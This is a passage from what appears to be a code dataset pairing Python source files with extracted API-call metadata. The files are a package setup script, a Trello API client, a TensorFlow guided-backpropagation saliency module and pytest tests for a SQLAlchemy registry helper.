27, 807, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((808, 19, 808, 64), 'time.strftime', 'time.strftime', ({(808, 33, 808, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (808, 55, 808, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((823, 10, 823, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(823, 33, 823, 42): 'api_token', (823, 44, 823, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((829, 10, 829, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((830, 15, 830, 43), 'time.gmtime', 'time.gmtime', ({(830, 27, 830, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((831, 19, 831, 64), 'time.strftime', 'time.strftime', ({(831, 33, 831, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (831, 55, 831, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((845, 10, 845, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(845, 33, 845, 42): 'api_token', (845, 44, 845, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((851, 10, 851, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((852, 15, 852, 43), 'time.gmtime', 'time.gmtime', ({(852, 27, 852, 42): 'now + 24 * 3600'}, {}), '(now + 24 * 3600)', False, 'import time\n'), ((853, 19, 853, 64), 'time.strftime', 'time.strftime', ({(853, 33, 853, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (853, 55, 853, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((857, 15, 857, 48), 'time.gmtime', 'time.gmtime', ({(857, 27, 857, 47): 'now + 24 * 3600 + 60'}, {}), '(now + 24 * 3600 + 60)', False, 'import time\n'), ((858, 19, 858, 64), 'time.strftime', 'time.strftime', ({(858, 33, 858, 53): '"""%Y-%m-%dT%H:%M:%SZ"""', (858, 55, 
858, 63): 'tomorrow'}, {}), "('%Y-%m-%dT%H:%M:%SZ', tomorrow)", False, 'import time\n'), ((872, 10, 872, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(872, 33, 872, 42): 'api_token', (872, 44, 872, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((883, 10, 883, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(883, 33, 883, 42): 'api_token', (883, 44, 883, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((895, 10, 895, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(895, 33, 895, 42): 'api_token', (895, 44, 895, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((896, 11, 896, 59), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(896, 34, 896, 44): 'api_token2', (896, 46, 896, 58): 'api_endpoint'}, {}), '(api_token2, api_endpoint)', False, 'import todoist\n'), ((935, 10, 935, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(935, 33, 935, 42): 'api_token', (935, 44, 935, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((936, 11, 936, 59), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(936, 34, 936, 44): 'api_token2', (936, 46, 936, 58): 'api_endpoint'}, {}), '(api_token2, api_endpoint)', False, 'import todoist\n'), ((974, 10, 974, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(974, 33, 974, 42): 'api_token', (974, 44, 974, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((975, 11, 975, 59), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(975, 34, 975, 44): 'api_token2', (975, 46, 975, 58): 'api_endpoint'}, {}), '(api_token2, api_endpoint)', False, 'import todoist\n'), ((1010, 10, 1010, 57), 'todoist.api.TodoistAPI', 'todoist.api.TodoistAPI', ({(1010, 33, 1010, 42): 'api_token', (1010, 44, 1010, 56): 'api_endpoint'}, {}), '(api_token, api_endpoint)', False, 'import todoist\n'), ((1023, 9, 1023, 59), 'io.open', 'io.open', (), '', False, 'import io\n'), ((812, 27, 812, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
dylancrockett/iot.io | setup.py | 472767186a5500e05b02d821f32e1208f3652418 | from setuptools import setup
import iotio
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="iot.io",
version=iotio.__version__,
packages=["iotio"],
author="Dylan Crockett",
author_email="[email protected]",
license="MIT",
description="A management API for connecting and managing Clients via websocket connections.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dylancrockett/iot.io",
project_urls={
"Documentation": "https://iotio.readthedocs.io/",
"Source Code": "https://github.com/dylancrockett/iot.io"
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
install_requires=[
'gevent',
'gevent-websocket',
'flask',
'flask-sockets',
],
python_requires='>=3.7'
)
| [((7, 0, 34, 1), 'setuptools.setup', 'setup', (), '', False, 'from setuptools import setup\n')] |
xnoder/trellominer | trellominer/api/trello.py | 629d8f916486aa94a5bfa3a9497c36316c2864ed | import os
import requests
from trellominer.config import yaml
class HTTP(object):
def __init__(self):
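# Every setting is resolved from an environment variable first, falling back
# to the value loaded from the YAML config file (~/.trellominer.yaml by default).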
self.config = yaml.read(os.getenv("TRELLO_CONFIG", default=os.path.join(os.path.expanduser('~'), ".trellominer.yaml")))
self.api_url = os.getenv("TRELLO_URL", default=self.config['api']['url'])
self.api_key = os.getenv("TRELLO_API_KEY", default=self.config['api']['key'])
self.api_token = os.getenv("TRELLO_API_TOKEN", default=self.config['api']['token'])
self.organization = os.getenv("TRELLO_ORGANIZATION", default=self.config['api']['organization'])
self.output_file = os.getenv("TRELLO_OUTPUT_FILE", default=self.config['api']['output_file_name'])
class Trello(HTTP):
def __init__(self):
super().__init__()
def boards(self):
url = "{0}/organizations/{1}/boards?key={2}&token={3}".format(
self.api_url, self.organization, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def cards(self, board_id):
url = "{0}/boards/{1}/cards?fields=shortLink,name,desc,idList,due,dueComplete,closed,idMembers&members=true&member_fields=fullName&key={2}&token={3}".format(
self.api_url, board_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def lists(self, list_id):
url = "{0}/lists/{1}?key={2}&token={3}".format(self.api_url, list_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
def checklists(self, card_id):
url = "{0}/cards/{1}/checklists?key={2}&token={3}".format(
self.api_url, card_id, self.api_key, self.api_token)
req = requests.get(url, params=None)
return req.json()
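# Illustrative usage sketch (added; not part of the original module). The HTTP base class
# above reads its settings from TRELLO_* environment variables or ~/.trellominer.yaml, so
# this demo assumes such a configuration already exists.
if __name__ == "__main__":
    client = Trello()
    # List the boards of the configured organization.
    for board in client.boards():
        print(board.get("id"), board.get("name"))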
| [((12, 23, 12, 81), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((13, 23, 13, 85), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((14, 25, 14, 91), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((15, 28, 15, 104), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((16, 27, 16, 106), 'os.getenv', 'os.getenv', (), '', False, 'import os\n'), ((26, 14, 26, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((32, 14, 32, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((37, 14, 37, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((43, 14, 43, 44), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((11, 80, 11, 103), 'os.path.expanduser', 'os.path.expanduser', ({(11, 99, 11, 102): '"""~"""'}, {}), "('~')", False, 'import os\n')] |
wezteoh/face_perception_thru_backprop | alexnet_guided_bp_vanilla.py | 449f78ce330876ff25fbcdf892023fd2ba86005c | import numpy as np
import tensorflow as tf
import os
from scipy.io import savemat
from scipy.io import loadmat
from scipy.misc import imread
from scipy.misc import imsave
from alexnet_face_classifier import *
import matplotlib.pyplot as plt
plt.switch_backend('agg')
class backprop_graph:
def __init__(self, num_classes, nhid, cnn):
self.num_classes = num_classes
self.inputs = tf.placeholder(tf.float32, shape = [None, 227, 227, 3], name='input')
self.labels_1hot = tf.placeholder(tf.float32, shape=[None, self.num_classes])
self.cnn = cnn(self.inputs, None, self.num_classes)
self.cnn.preprocess()
self.cnn.convlayers()
self.cnn.fc_layers(transfer_learning=False, nhid=nhid)
def classifier_graph(self, temp=3.0):
self.probabilities = tf.nn.softmax(self.cnn.fc2/temp)
self.probability = tf.tensordot(self.probabilities, self.labels_1hot, axes=[[1],[1]])
self.log_probability = tf.log(self.probability)
def guided_backprop_graph(self):
self.grad_fc2 = tf.nn.relu(tf.gradients(self.probability, self.cnn.fc2)[0])
self.grad_fc1 = tf.nn.relu(tf.gradients(self.cnn.fc2, self.cnn.fc1, grad_ys=self.grad_fc2)[0])
self.grad_conv5 = tf.nn.relu(tf.gradients(self.cnn.fc1, self.cnn.conv5, grad_ys=self.grad_fc1)[0])
self.grad_conv4 = tf.nn.relu(tf.gradients(self.cnn.conv5, self.cnn.conv4, grad_ys=self.grad_conv5)[0])
self.grad_conv3 = tf.nn.relu(tf.gradients(self.cnn.conv4, self.cnn.conv3, grad_ys=self.grad_conv4)[0])
self.grad_conv2 = tf.nn.relu(tf.gradients(self.cnn.conv3, self.cnn.conv2, grad_ys=self.grad_conv3)[0])
self.grad_conv1 = tf.nn.relu(tf.gradients(self.cnn.conv2, self.cnn.conv1, grad_ys=self.grad_conv2)[0])
self.grad_image = tf.nn.relu(tf.gradients(self.cnn.conv1, self.inputs, grad_ys=self.grad_conv1)[0])
###
def guided_backprop(graph, image, one_hot, sess):
image = np.expand_dims(image, 0)
one_hot = np.expand_dims(one_hot, 0)
saliency_map = sess.run(graph.grad_image, feed_dict={graph.inputs:image, graph.labels_1hot:one_hot})[0]
scaling_adjustment = 1E-20
saliency_map_scaled = saliency_map/(np.max(saliency_map)+scaling_adjustment)
return saliency_map_scaled
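# Illustrative usage sketch (kept as comments because the classifier class exported by
# alexnet_face_classifier, the number of identities and the weight-restoring step are
# assumptions, not shown in this file):
#
#   graph = backprop_graph(num_classes=6, nhid=100, cnn=<classifier class>)
#   graph.classifier_graph()
#   graph.guided_backprop_graph()
#   with tf.Session() as sess:
#       sess.run(tf.global_variables_initializer())  # or restore trained weights instead
#       face = np.zeros((227, 227, 3), dtype=np.float32)  # one 227x227 RGB image
#       one_hot = np.eye(6)[0]                            # target identity as one-hot
#       saliency = guided_backprop(graph, face, one_hot, sess)
#       plt.imsave('saliency.png', saliency)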
| [((12, 0, 12, 25), 'matplotlib.pyplot.switch_backend', 'plt.switch_backend', ({(12, 19, 12, 24): '"""agg"""'}, {}), "('agg')", True, 'import matplotlib.pyplot as plt\n'), ((44, 12, 44, 36), 'numpy.expand_dims', 'np.expand_dims', ({(44, 27, 44, 32): 'image', (44, 34, 44, 35): '0'}, {}), '(image, 0)', True, 'import numpy as np\n'), ((45, 14, 45, 40), 'numpy.expand_dims', 'np.expand_dims', ({(45, 29, 45, 36): 'one_hot', (45, 38, 45, 39): '0'}, {}), '(one_hot, 0)', True, 'import numpy as np\n'), ((18, 22, 18, 91), 'tensorflow.placeholder', 'tf.placeholder', (), '', True, 'import tensorflow as tf\n'), ((19, 27, 19, 85), 'tensorflow.placeholder', 'tf.placeholder', (), '', True, 'import tensorflow as tf\n'), ((26, 29, 26, 61), 'tensorflow.nn.softmax', 'tf.nn.softmax', ({(26, 43, 26, 60): 'self.cnn.fc2 / temp'}, {}), '(self.cnn.fc2 / temp)', True, 'import tensorflow as tf\n'), ((27, 27, 27, 93), 'tensorflow.tensordot', 'tf.tensordot', (), '', True, 'import tensorflow as tf\n'), ((28, 31, 28, 55), 'tensorflow.log', 'tf.log', ({(28, 38, 28, 54): 'self.probability'}, {}), '(self.probability)', True, 'import tensorflow as tf\n'), ((48, 40, 48, 60), 'numpy.max', 'np.max', ({(48, 47, 48, 59): 'saliency_map'}, {}), '(saliency_map)', True, 'import numpy as np\n'), ((31, 35, 31, 79), 'tensorflow.gradients', 'tf.gradients', ({(31, 48, 31, 64): 'self.probability', (31, 66, 31, 78): 'self.cnn.fc2'}, {}), '(self.probability, self.cnn.fc2)', True, 'import tensorflow as tf\n'), ((32, 35, 32, 98), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((33, 37, 33, 102), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((34, 37, 34, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((35, 37, 35, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((36, 37, 36, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((37, 37, 37, 106), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n'), ((38, 37, 38, 103), 'tensorflow.gradients', 'tf.gradients', (), '', True, 'import tensorflow as tf\n')] |
AferriDaniel/coaster | tests/test_sqlalchemy_registry.py | 3ffbc9d33c981284593445299aaee0c3cc0cdb0b | """Registry and RegistryMixin tests."""
from types import SimpleNamespace
import pytest
from coaster.db import db
from coaster.sqlalchemy import BaseMixin
from coaster.sqlalchemy.registry import Registry
# --- Fixtures -------------------------------------------------------------------------
@pytest.fixture()
def CallableRegistry(): # noqa: N802
"""Callable registry with a positional parameter."""
class CallableRegistry:
registry = Registry()
return CallableRegistry
@pytest.fixture()
def PropertyRegistry(): # noqa: N802
"""Registry with property and a positional parameter."""
class PropertyRegistry:
registry = Registry(property=True)
return PropertyRegistry
@pytest.fixture()
def CachedPropertyRegistry(): # noqa: N802
"""Registry with cached property and a positional parameter."""
class CachedPropertyRegistry:
registry = Registry(cached_property=True)
return CachedPropertyRegistry
@pytest.fixture()
def CallableParamRegistry(): # noqa: N802
"""Callable registry with a keyword parameter."""
class CallableParamRegistry:
registry = Registry('kwparam')
return CallableParamRegistry
@pytest.fixture()
def PropertyParamRegistry(): # noqa: N802
"""Registry with property and a keyword parameter."""
class PropertyParamRegistry:
registry = Registry('kwparam', property=True)
return PropertyParamRegistry
@pytest.fixture()
def CachedPropertyParamRegistry(): # noqa: N802
"""Registry with cached property and a keyword parameter."""
class CachedPropertyParamRegistry:
registry = Registry('kwparam', cached_property=True)
return CachedPropertyParamRegistry
@pytest.fixture()
def all_registry_hosts(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""All test registries as a list."""
return [
CallableRegistry,
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
]
@pytest.fixture(scope='module')
def registry_member():
"""Test registry member function."""
def member(pos=None, kwparam=None):
pass
return member
@pytest.fixture(scope='session')
def registrymixin_models():
"""Fixtures for RegistryMixin tests."""
# We have two sample models and two registered items to test that
# the registry is unique to each model and is not a global registry
# in the base RegistryMixin class.
# Sample model 1
class RegistryTest1(BaseMixin, db.Model):
"""Registry test model 1."""
__tablename__ = 'registry_test1'
# Sample model 2
class RegistryTest2(BaseMixin, db.Model):
"""Registry test model 2."""
__tablename__ = 'registry_test2'
# Sample registered item (form or view) 1
class RegisteredItem1:
"""Registered item 1."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 2
@RegistryTest2.views('test')
class RegisteredItem2:
"""Registered item 2."""
def __init__(self, obj=None):
"""Init class."""
self.obj = obj
# Sample registered item 3
@RegistryTest1.features('is1')
@RegistryTest2.features()
def is1(obj):
"""Assert object is instance of RegistryTest1."""
return isinstance(obj, RegistryTest1)
RegistryTest1.views.test = RegisteredItem1
return SimpleNamespace(**locals())
# --- Tests ----------------------------------------------------------------------------
# --- Creating a registry
def test_registry_set_name():
"""Registry's __set_name__ gets called."""
# Registry has no name unless added to a class
assert Registry()._name is None
class RegistryUser:
reg1 = Registry()
reg2 = Registry()
assert RegistryUser.reg1._name == 'reg1'
assert RegistryUser.reg2._name == 'reg2'
def test_registry_reuse_error():
"""Registries cannot be reused under different names."""
# Registry raises TypeError from __set_name__, but Python recasts as RuntimeError
with pytest.raises(RuntimeError):
class RegistryUser:
a = b = Registry()
def test_registry_reuse_okay():
"""Registries be reused with the same name under different hosts."""
reusable = Registry()
assert reusable._name is None
class HostA:
registry = reusable
assert HostA.registry._name == 'registry'
class HostB:
registry = reusable
assert HostB.registry._name == 'registry'
assert HostA.registry is HostB.registry
assert HostA.registry is reusable
def test_registry_param_type():
"""Registry's param must be string or None."""
r = Registry()
assert r._param is None
r = Registry('')
assert r._param is None
r = Registry(1)
assert r._param == '1'
r = Registry('obj')
assert r._param == 'obj'
r = Registry(param='foo')
assert r._param == 'foo'
def test_registry_property_cached_property():
"""A registry can have property or cached_property set, but not both."""
r = Registry()
assert r._default_property is False
assert r._default_cached_property is False
r = Registry(property=True)
assert r._default_property is True
assert r._default_cached_property is False
r = Registry(cached_property=True)
assert r._default_property is False
assert r._default_cached_property is True
with pytest.raises(TypeError):
Registry(property=True, cached_property=True)
# --- Populating a registry
def test_add_to_registry(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added to registries and accessed as per registry settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member(1) == (1, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_property_cache_mismatch(
PropertyRegistry, CachedPropertyRegistry # noqa: N803
):
"""A registry's default setting must be explicitly turned off if conflicting."""
with pytest.raises(TypeError):
@PropertyRegistry.registry(cached_property=True)
def member1(pos=None, kwparam=None):
return (pos, kwparam)
with pytest.raises(TypeError):
@CachedPropertyRegistry.registry(property=True)
def member2(pos=None, kwparam=None):
return (pos, kwparam)
@PropertyRegistry.registry(cached_property=True, property=False)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
def test_add_to_registry_host(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a function, overriding default settings."""
@CallableRegistry.registry()
@PropertyRegistry.registry(property=False)
@CachedPropertyRegistry.registry(cached_property=False)
@CallableParamRegistry.registry()
@PropertyParamRegistry.registry(property=False)
@CachedPropertyParamRegistry.registry(cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member(1) == (callable_host, 1)
assert property_host.registry.member(2) == (property_host, 2)
assert cached_property_host.registry.member(3) == (cached_property_host, 3)
assert callable_param_host.registry.member(4) == (4, callable_param_host)
assert property_param_host.registry.member(5) == (5, property_param_host)
assert cached_property_param_host.registry.member(6) == (
6,
cached_property_param_host,
)
def test_add_to_registry_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_cached_property(
CallableRegistry, # noqa: N803
PropertyRegistry,
CachedPropertyRegistry,
CallableParamRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""A member can be added as a property, overriding default settings."""
@CallableRegistry.registry(property=True)
@PropertyRegistry.registry(property=True)
@CachedPropertyRegistry.registry(property=True, cached_property=False)
@CallableParamRegistry.registry(property=True)
@PropertyParamRegistry.registry(property=True)
@CachedPropertyParamRegistry.registry(property=True, cached_property=False)
def member(pos=None, kwparam=None):
return (pos, kwparam)
callable_host = CallableRegistry()
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
callable_param_host = CallableParamRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
assert callable_host.registry.member == (callable_host, None)
assert property_host.registry.member == (property_host, None)
assert cached_property_host.registry.member == (cached_property_host, None)
assert callable_param_host.registry.member == (None, callable_param_host)
assert property_param_host.registry.member == (None, property_param_host)
assert cached_property_param_host.registry.member == (
None,
cached_property_param_host,
)
def test_add_to_registry_custom_name(all_registry_hosts, registry_member):
"""Members can be added to a registry with a custom name."""
assert registry_member.__name__ == 'member'
for host in all_registry_hosts:
# Mock decorator call
host.registry('custom')(registry_member)
# This adds the member under the custom name
assert host.registry.custom is registry_member
# The default name of the function is not present...
with pytest.raises(AttributeError):
assert host.registry.member is registry_member
# ... but can be added
host.registry()(registry_member)
assert host.registry.member is registry_member
def test_add_to_registry_underscore(all_registry_hosts, registry_member):
"""Registry member names cannot start with an underscore."""
for host in all_registry_hosts:
with pytest.raises(ValueError):
host.registry('_new_member')(registry_member)
def test_add_to_registry_dupe(all_registry_hosts, registry_member):
"""Registry member names cannot be duplicates of an existing name."""
for host in all_registry_hosts:
host.registry()(registry_member)
with pytest.raises(ValueError):
host.registry()(registry_member)
host.registry('custom')(registry_member)
with pytest.raises(ValueError):
host.registry('custom')(registry_member)
def test_cached_properties_are_cached(
PropertyRegistry, # noqa: N803
CachedPropertyRegistry,
PropertyParamRegistry,
CachedPropertyParamRegistry,
):
"""Cached properties are truly cached."""
# Register registry member
@PropertyRegistry.registry()
@CachedPropertyRegistry.registry()
@PropertyParamRegistry.registry()
@CachedPropertyParamRegistry.registry()
def member(pos=None, kwparam=None):
return [pos, kwparam] # Lists are different each call
property_host = PropertyRegistry()
cached_property_host = CachedPropertyRegistry()
property_param_host = PropertyParamRegistry()
cached_property_param_host = CachedPropertyParamRegistry()
# The properties and cached properties work
assert property_host.registry.member == [property_host, None]
assert cached_property_host.registry.member == [cached_property_host, None]
assert property_param_host.registry.member == [None, property_param_host]
assert cached_property_param_host.registry.member == [
None,
cached_property_param_host,
]
# The properties and cached properties return equal values on each access
assert property_host.registry.member == property_host.registry.member
assert cached_property_host.registry.member == cached_property_host.registry.member
assert property_param_host.registry.member == property_param_host.registry.member
assert (
cached_property_param_host.registry.member
== cached_property_param_host.registry.member
)
# Only the cached properties return the same value every time
assert property_host.registry.member is not property_host.registry.member
assert cached_property_host.registry.member is cached_property_host.registry.member
assert (
property_param_host.registry.member is not property_param_host.registry.member
)
assert (
cached_property_param_host.registry.member
is cached_property_param_host.registry.member
)
# TODO:
# test_registry_member_cannot_be_called_clear_cache
# test_multiple_positional_and_keyword_arguments
# test_registry_iter
# test_registry_members_must_be_callable
# test_add_by_directly_sticking_in
# test_instance_registry_is_cached
# test_clear_cache_for
# test_clear_cache
# test_registry_mixin_config
# test_registry_mixin_subclasses
# --- RegistryMixin tests --------------------------------------------------------------
def test_access_item_from_class(registrymixin_models):
"""Registered items are available from the model class."""
assert (
registrymixin_models.RegistryTest1.views.test
is registrymixin_models.RegisteredItem1
)
assert (
registrymixin_models.RegistryTest2.views.test
is registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest1.views.test
is not registrymixin_models.RegisteredItem2
)
assert (
registrymixin_models.RegistryTest2.views.test
is not registrymixin_models.RegisteredItem1
)
assert registrymixin_models.RegistryTest1.features.is1 is registrymixin_models.is1
assert registrymixin_models.RegistryTest2.features.is1 is registrymixin_models.is1
def test_access_item_class_from_instance(registrymixin_models):
"""Registered items are available from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
# When accessed from the instance, we get a partial that resembles
# the wrapped item, but is not the item itself.
assert r1.views.test is not registrymixin_models.RegisteredItem1
assert r1.views.test.func is registrymixin_models.RegisteredItem1
assert r2.views.test is not registrymixin_models.RegisteredItem2
assert r2.views.test.func is registrymixin_models.RegisteredItem2
assert r1.features.is1 is not registrymixin_models.is1
assert r1.features.is1.func is registrymixin_models.is1
assert r2.features.is1 is not registrymixin_models.is1
assert r2.features.is1.func is registrymixin_models.is1
def test_access_item_instance_from_instance(registrymixin_models):
"""Registered items can be instantiated from the model instance."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
i1 = r1.views.test()
i2 = r2.views.test()
assert isinstance(i1, registrymixin_models.RegisteredItem1)
assert isinstance(i2, registrymixin_models.RegisteredItem2)
assert not isinstance(i1, registrymixin_models.RegisteredItem2)
assert not isinstance(i2, registrymixin_models.RegisteredItem1)
assert i1.obj is r1
assert i2.obj is r2
assert i1.obj is not r2
assert i2.obj is not r1
def test_features(registrymixin_models):
"""The features registry can be used for feature tests."""
r1 = registrymixin_models.RegistryTest1()
r2 = registrymixin_models.RegistryTest2()
assert r1.features.is1() is True
assert r2.features.is1() is False
| [((14, 1, 14, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((24, 1, 24, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((34, 1, 34, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((44, 1, 44, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((54, 1, 54, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((64, 1, 64, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((74, 1, 74, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((94, 1, 94, 31), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((104, 1, 104, 32), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((181, 15, 181, 25), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((200, 8, 200, 18), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((202, 8, 202, 20), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(202, 17, 202, 19): '""""""'}, {}), "('')", False, 'from coaster.sqlalchemy.registry import Registry\n'), ((204, 8, 204, 19), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(204, 17, 204, 18): '1'}, {}), '(1)', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((206, 8, 206, 23), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({(206, 17, 206, 22): '"""obj"""'}, {}), "('obj')", False, 'from coaster.sqlalchemy.registry import Registry\n'), ((208, 8, 208, 29), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((214, 8, 214, 18), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((218, 8, 218, 31), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((222, 8, 222, 38), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((19, 19, 19, 29), 'coaster.sqlalchemy.registry.Registry', 'Registry', ({}, {}), '()', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((29, 19, 29, 42), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((39, 19, 39, 49), 'coaster.sqlalchemy.registry.Registry', 'Registry', (), '', False, 'from coaster.sqlalchemy.registry import Registry\n'), ((49, 19, 49, 38), 'coaster.sqlalchemy.registry.Registry', 